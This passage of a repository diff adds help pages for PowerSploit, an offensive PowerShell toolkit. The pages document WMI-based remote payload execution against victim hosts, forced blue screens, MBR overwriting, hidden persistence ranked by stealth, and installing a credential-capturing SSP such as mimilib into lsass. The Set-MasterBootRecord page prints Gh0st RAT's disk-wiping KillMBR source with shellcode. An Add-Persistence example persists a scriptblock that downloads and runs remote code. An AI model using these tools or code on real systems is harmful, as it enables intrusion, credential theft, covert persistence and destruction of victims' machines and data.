+By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/CodeExecution/Invoke-WmiCommand.md b/docs/CodeExecution/Invoke-WmiCommand.md
new file mode 100755
index 0000000..23e7d9e
--- /dev/null
+++ b/docs/CodeExecution/Invoke-WmiCommand.md
@@ -0,0 +1,311 @@
+# Invoke-WmiCommand

+

+## SYNOPSIS

+Executes a PowerShell ScriptBlock on a target computer using WMI as a

+pure C2 channel.

+

+Author: Matthew Graeber  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Invoke-WmiCommand [-Payload] <ScriptBlock> [[-RegistryHive] <String>] [[-RegistryKeyPath] <String>]

+ [[-RegistryPayloadValueName] <String>] [[-RegistryResultValueName] <String>] [[-ComputerName] <String[]>]

+ [[-Credential] <PSCredential>] [[-Impersonation] <ImpersonationLevel>]

+ [[-Authentication] <AuthenticationLevel>] [-EnableAllPrivileges] [[-Authority] <String>]

+```

+

+## DESCRIPTION

+Invoke-WmiCommand executes a PowerShell ScriptBlock on a target

+computer using WMI as a pure C2 channel.

+It does this by using the

+StdRegProv WMI registry provider methods to store a payload into a

+registry value.

+The command is then executed on the victim system and

+the output is stored in another registry value that is then retrieved

+remotely.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1'

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$Hosts = Get-Content hostnames.txt

+```

+

+PS C:\\\>$Payload = Get-Content payload.ps1

+PS C:\\\>$Credential = Get-Credential 'TargetDomain\TargetUser'

+PS C:\\\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$Payload = Get-Content payload.ps1

+```

+

+PS C:\\\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2'

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\Administrator' -Verbose

+```

+

+## PARAMETERS

+

+### -Payload

+Specifies the payload to be executed on the remote system.

+

+```yaml

+Type: ScriptBlock

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RegistryHive

+{{Fill RegistryHive Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: HKEY_CURRENT_USER

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RegistryKeyPath

+Specifies the registry key where the payload and payload output will

+be stored.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 3

+Default value: SOFTWARE\Microsoft\Cryptography\RNG

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RegistryPayloadValueName

+Specifies the registry value name where the payload will be stored.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: Seed

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RegistryResultValueName

+Specifies the registry value name where the payload output will be

+stored.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: Value

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerName

+Runs the command on the specified computers.

+The default is the local

+computer.

+

+Type the NetBIOS name, an IP address, or a fully qualified domain

+name of one or more computers.

+To specify the local computer, type

+the computer name, a dot (.), or "localhost".

+

+This parameter does not rely on Windows PowerShell remoting.

+You can

+use the ComputerName parameter even if your computer is not

+configured to run remote commands.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: Cn

+

+Required: False

+Position: 6

+Default value: Localhost

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+Specifies a user account that has permission to perform this action.

+The default is the current user.

+Type a user name, such as "User01",

+"Domain01\User01", or User@Contoso.com.

+Or, enter a PSCredential

+object, such as an object that is returned by the Get-Credential

+cmdlet.

+When you type a user name, you will be prompted for a

+password.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 7

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Impersonation

+Specifies the impersonation level to use.

+Valid values are:

+

+0: Default (Reads the local registry for the default impersonation level, which is usually set to "3: Impersonate".)

+

+1: Anonymous (Hides the credentials of the caller.)

+

+2: Identify (Allows objects to query the credentials of the caller.)

+

+3: Impersonate (Allows objects to use the credentials of the caller.)

+

+4: Delegate (Allows objects to permit other objects to use the credentials of the caller.)

+

+```yaml

+Type: ImpersonationLevel

+Parameter Sets: (All)

+Aliases: 

+Accepted values: Default, Anonymous, Identify, Impersonate, Delegate

+

+Required: False

+Position: 8

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Authentication

+Specifies the authentication level to be used with the WMI connection.

+Valid values are:

+

+-1: Unchanged

+

+0: Default

+

+1: None (No authentication in performed.)

+

+2: Connect (Authentication is performed only when the client establishes a relationship with the application.)

+

+3: Call (Authentication is performed only at the beginning of each call when the application receives the request.)

+

+4: Packet (Authentication is performed on all the data that is received from the client.)

+

+5: PacketIntegrity (All the data that is transferred between the client  and the application is authenticated and verified.)

+

+6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.)

+

+```yaml

+Type: AuthenticationLevel

+Parameter Sets: (All)

+Aliases: 

+Accepted values: Default, None, Connect, Call, Packet, PacketIntegrity, PacketPrivacy, Unchanged

+

+Required: False

+Position: 9

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -EnableAllPrivileges

+Enables all the privileges of the current user before the command

+makes the WMI call.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Authority

+Specifies the authority to use to authenticate the WMI connection.

+You can specify standard NTLM or Kerberos authentication.

+To use

+NTLM, set the authority setting to ntlmdomain:\<DomainName\>, where

+\<DomainName\> identifies a valid NTLM domain name.

+To use Kerberos,

+specify kerberos:\<DomainName\ServerName\>.

+You cannot include the

+authority setting when you connect to the local computer.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 10

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### System.String[]

+

+Accepts one or more host names/IP addresses over the pipeline.

+

+## OUTPUTS

+

+### System.Management.Automation.PSObject

+

+Outputs a custom object consisting of the target computer name and

+the output of the command executed.

+

+## NOTES

+In order to receive the output from your payload, it must return

+actual objects.

+For example, Write-Host doesn't return objects

+rather, it writes directly to the console.

+If you're using

+Write-Host in your scripts though, you probably don't deserve to get

+the output of your payload back.

+:P

+

+## RELATED LINKS

+

diff --git a/docs/Mayhem/Set-CriticalProcess.md b/docs/Mayhem/Set-CriticalProcess.md
new file mode 100755
index 0000000..1ec952f
--- /dev/null
+++ b/docs/Mayhem/Set-CriticalProcess.md
@@ -0,0 +1,108 @@
+# Set-CriticalProcess

+

+## SYNOPSIS

+Causes your machine to blue screen upon exiting PowerShell.

+

+PowerSploit Function: Set-CriticalProcess  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]

+```

+

+## DESCRIPTION

+{{Fill in the Description}}

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Set-CriticalProcess

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Set-CriticalProcess -ExitImmediately

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Set-CriticalProcess -Force -Verbose

+```

+

+## PARAMETERS

+

+### -Force

+Set the running PowerShell process as critical without asking for confirmation.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExitImmediately

+Immediately exit PowerShell after successfully marking the process as critical.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -WhatIf

+Shows what would happen if the cmdlet runs.

+The cmdlet is not run.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: wi

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Confirm

+Prompts you for confirmation before running the cmdlet.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: cf

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Mayhem/Set-MasterBootRecord.md b/docs/Mayhem/Set-MasterBootRecord.md
new file mode 100755
index 0000000..0aa994d
--- /dev/null
+++ b/docs/Mayhem/Set-MasterBootRecord.md
@@ -0,0 +1,184 @@
+# Set-MasterBootRecord

+

+## SYNOPSIS

+Proof of concept code that overwrites the master boot record with the

+message of your choice.

+

+PowerSploit Function: Set-MasterBootRecord  

+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]

+```

+

+## DESCRIPTION

+Set-MasterBootRecord is proof of concept code designed to show that it is

+possible with PowerShell to overwrite the MBR.

+This technique was taken

+from a public malware sample.

+This script is inteded solely as proof of

+concept code.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'

+```

+

+## PARAMETERS

+

+### -BootMessage

+Specifies the message that will be displayed upon making your computer a brick.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: Stop-Crying; Get-NewHardDrive

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RebootImmediately

+Reboot the machine immediately upon overwriting the MBR.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Force

+Suppress the warning prompt.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -WhatIf

+Shows what would happen if the cmdlet runs.

+The cmdlet is not run.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: wi

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Confirm

+Prompts you for confirmation before running the cmdlet.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: cf

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+Obviously, this will only work if you have a master boot record to

+overwrite.

+This won't work if you have a GPT (GUID partition table).

+

+This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):

+

+// CGh0stApp message handlers

+

+unsigned char scode\[\] =

+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"

+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"

+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";

+

+int CGh0stApp::KillMBR()

+{

+	HANDLE hDevice;

+	DWORD dwBytesWritten, dwBytesReturned;

+	BYTE pMBR\[512\] = {0};

+

+	// ????MBR

+	memcpy(pMBR, scode, sizeof(scode) - 1);

+	pMBR\[510\] = 0x55;

+	pMBR\[511\] = 0xAA;

+

+	hDevice = CreateFile

+		(

+		"\\\\\\\\.\\\\PHYSICALDRIVE0",

+		GENERIC_READ | GENERIC_WRITE,

+		FILE_SHARE_READ | FILE_SHARE_WRITE,

+		NULL,

+		OPEN_EXISTING,

+		0,

+		NULL

+		);

+	if (hDevice == INVALID_HANDLE_VALUE)

+		return -1;

+	DeviceIoControl

+		(

+		hDevice,

+		FSCTL_LOCK_VOLUME,

+		NULL,

+		0,

+		NULL,

+		0,

+		&dwBytesReturned,

+		NUL

+		)

+	// ??????

+	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);

+	DeviceIoControl

+		(

+		hDevice,

+		FSCTL_UNLOCK_VOLUME,

+		NULL,

+		0,

+		NULL,

+		0,

+		&dwBytesReturned,

+		NULL

+		);

+	CloseHandle(hDevice);

+

+	ExitProcess(-1);

+	return 0;

+}

+

+## RELATED LINKS

+

diff --git a/docs/Persistence/Add-Persistence.md b/docs/Persistence/Add-Persistence.md
new file mode 100755
index 0000000..bdd14fb
--- /dev/null
+++ b/docs/Persistence/Add-Persistence.md
@@ -0,0 +1,227 @@
+# Add-Persistence

+

+## SYNOPSIS

+Add persistence capabilities to a script.

+

+PowerSploit Function: Add-Persistence  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption  

+Optional Dependencies: None

+

+## SYNTAX

+

+### ScriptBlock

+```

+Add-Persistence -ScriptBlock <ScriptBlock> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>

+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]

+ [-DoNotPersistImmediately] [-PassThru]

+```

+

+### FilePath

+```

+Add-Persistence -FilePath <String> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>

+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]

+ [-DoNotPersistImmediately] [-PassThru]

+```

+

+## DESCRIPTION

+Add-Persistence will add persistence capabilities to any script or scriptblock.

+This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'

+```

+

+$UserOptions = New-UserPersistenceOption -Registry -AtLogon

+Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

+

+Description

+-----------

+Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.

+elevated) determined at runtime.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }

+```

+

+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle

+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle

+Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1

+

+Description

+-----------

+Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.

+elevated) determined at runtime.

+The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement.

+The final, encoded output is finally saved to .\EncodedPersistentScript.ps1

+

+## PARAMETERS

+

+### -ScriptBlock

+Specifies a scriptblock containing your payload.

+

+```yaml

+Type: ScriptBlock

+Parameter Sets: ScriptBlock

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -FilePath

+Specifies the path to your payload.

+

+```yaml

+Type: String

+Parameter Sets: FilePath

+Aliases: Path

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ElevatedPersistenceOption

+Specifies the trigger for the persistent payload if the target is running elevated.

+You must run New-ElevatedPersistenceOption to generate this argument.

+

+```yaml

+Type: Object

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserPersistenceOption

+Specifies the trigger for the persistent payload if the target is not running elevated.

+You must run New-UserPersistenceOption to generate this argument.

+

+```yaml

+Type: Object

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PersistenceScriptName

+Specifies the name of the function that will wrap the original payload.

+The default value is 'Update-Windows'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Update-Windows

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PersistentScriptFilePath

+Specifies the path where you would like to output the persistence script.

+By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: "$PWD\Persistence.ps1"

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RemovalScriptFilePath

+Specifies the path where you would like to output a script that will remove the persistent payload.

+By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: "$PWD\RemovePersistence.ps1"

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -DoNotPersistImmediately

+Output only the wrapper function for the original payload.

+By default, Add-Persistence will output a script that will automatically attempt to persist (e.g.

+it will end with 'Update-Windows -Persist').

+If you are in a position where you are running in memory but want to persist at a later time, use this option.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PassThru

+Outputs the contents of the persistent script to the pipeline.

+This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### None

+

+Add-Persistence cannot receive any input from the pipeline.

+

+## OUTPUTS

+

+### System.Management.Automation.ScriptBlock

+

+If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.

+

+## NOTES

+When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.

+

+## RELATED LINKS

+

+[http://www.exploit-monday.com](http://www.exploit-monday.com)

+

diff --git a/docs/Persistence/Get-SecurityPackage.md b/docs/Persistence/Get-SecurityPackage.md
new file mode 100755
index 0000000..2a0cdef
--- /dev/null
+++ b/docs/Persistence/Get-SecurityPackage.md
@@ -0,0 +1,37 @@
+# Get-SecurityPackage

+

+## SYNOPSIS

+Enumerates all loaded security packages (SSPs).

+

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Get-SecurityPackage

+```

+

+## DESCRIPTION

+Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.

+It also parses the returned SecPkgInfo struct array.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-SecurityPackage

+```

+

+## PARAMETERS

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Persistence/Install-SSP.md b/docs/Persistence/Install-SSP.md
new file mode 100755
index 0000000..99193c0
--- /dev/null
+++ b/docs/Persistence/Install-SSP.md
@@ -0,0 +1,60 @@
+# Install-SSP

+

+## SYNOPSIS

+Installs a security support provider (SSP) dll.

+

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Install-SSP [[-Path] <String>]

+```

+

+## DESCRIPTION

+Install-SSP installs an SSP dll.

+Installation involves copying the dll to

+%windir%\System32 and adding the name of the dll to

+HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Install-SSP -Path .\mimilib.dll

+```

+

+## PARAMETERS

+

+### -Path

+{{Fill Path Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+The SSP dll must match the OS architecture.

+i.e.

+You must have a 64-bit SSP dll

+if you are running a 64-bit OS.

+In order for the SSP dll to be loaded properly

+into lsass, the dll must export SpLsaModeInitialize.

+

+## RELATED LINKS

+

diff --git a/docs/Persistence/New-ElevatedPersistenceOption.md b/docs/Persistence/New-ElevatedPersistenceOption.md
new file mode 100755
index 0000000..efe215d
--- /dev/null
+++ b/docs/Persistence/New-ElevatedPersistenceOption.md
@@ -0,0 +1,235 @@
+# New-ElevatedPersistenceOption

+

+## SYNOPSIS

+Configure elevated persistence options for the Add-Persistence function.

+

+PowerSploit Function: New-ElevatedPersistenceOption  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+### PermanentWMIAtStartup

+```

+New-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup]

+```

+

+### PermanentWMIDaily

+```

+New-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At <DateTime>

+```

+

+### ScheduledTaskOnIdle

+```

+New-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle]

+```

+

+### ScheduledTaskAtLogon

+```

+New-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon]

+```

+

+### ScheduledTaskHourly

+```

+New-ElevatedPersistenceOption [-ScheduledTask] [-Hourly]

+```

+

+### ScheduledTaskDaily

+```

+New-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>

+```

+

+### Registry

+```

+New-ElevatedPersistenceOption [-Registry] [-AtLogon]

+```

+

+## DESCRIPTION

+New-ElevatedPersistenceOption allows for the configuration of elevated persistence options.

+The output of this function is a required parameter of Add-Persistence.

+Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle

+```

+

+## PARAMETERS

+

+### -PermanentWMI

+Persist via a permanent WMI event subscription.

+This option will be the most difficult to detect and remove.

+

+Detection Difficulty:        Difficult

+Removal Difficulty:          Difficult

+User Detectable? 

+No

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: PermanentWMIAtStartup, PermanentWMIDaily

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ScheduledTask

+Persist via a scheduled task.

+

+Detection Difficulty:        Moderate

+Removal Difficulty:          Moderate

+User Detectable? 

+No

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskAtLogon, ScheduledTaskHourly, ScheduledTaskDaily

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Registry

+Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.

+Note: This option will briefly pop up a PowerShell console to the user.

+

+Detection Difficulty:        Easy

+Removal Difficulty:          Easy

+User Detectable? 

+Yes

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: Registry

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Daily

+Starts the payload daily.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Hourly

+Starts the payload hourly.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ScheduledTaskHourly

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -At

+Starts the payload at the specified time.

+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.

+

+```yaml

+Type: DateTime

+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -OnIdle

+Starts the payload after one minute of idling.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ScheduledTaskOnIdle

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AtLogon

+Starts the payload upon any user logon.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ScheduledTaskAtLogon, Registry

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AtStartup

+Starts the payload within 240 and 325 seconds of computer startup.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: PermanentWMIAtStartup

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.exploit-monday.com](http://www.exploit-monday.com)

+

diff --git a/docs/Persistence/New-UserPersistenceOption.md b/docs/Persistence/New-UserPersistenceOption.md
new file mode 100755
index 0000000..c7c020f
--- /dev/null
+++ b/docs/Persistence/New-UserPersistenceOption.md
@@ -0,0 +1,179 @@
+# New-UserPersistenceOption

+

+## SYNOPSIS

+Configure user-level persistence options for the Add-Persistence function.

+

+PowerSploit Function: New-UserPersistenceOption  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+### ScheduledTaskOnIdle

+```

+New-UserPersistenceOption [-ScheduledTask] [-OnIdle]

+```

+

+### ScheduledTaskHourly

+```

+New-UserPersistenceOption [-ScheduledTask] [-Hourly]

+```

+

+### ScheduledTaskDaily

+```

+New-UserPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>

+```

+

+### Registry

+```

+New-UserPersistenceOption [-Registry] [-AtLogon]

+```

+

+## DESCRIPTION

+New-UserPersistenceOption allows for the configuration of elevated persistence options.

+The output of this function is a required parameter of Add-Persistence.

+Available persitence options in order of stealth are the following: scheduled task, registry.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$UserOptions = New-UserPersistenceOption -Registry -AtLogon

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle

+```

+

+## PARAMETERS

+

+### -ScheduledTask

+Persist via a scheduled task.

+

+Detection Difficulty:        Moderate

+Removal Difficulty:          Moderate

+User Detectable? 

+No

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskHourly, ScheduledTaskDaily

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Registry

+Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.

+Note: This option will briefly pop up a PowerShell console to the user.

+

+Detection Difficulty:        Easy

+Removal Difficulty:          Easy

+User Detectable? 

+Yes

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: Registry

+Aliases: 

+

+Required: True

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Daily

+Starts the payload daily.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: ScheduledTaskDaily

+Aliases: 

+

+Required: True

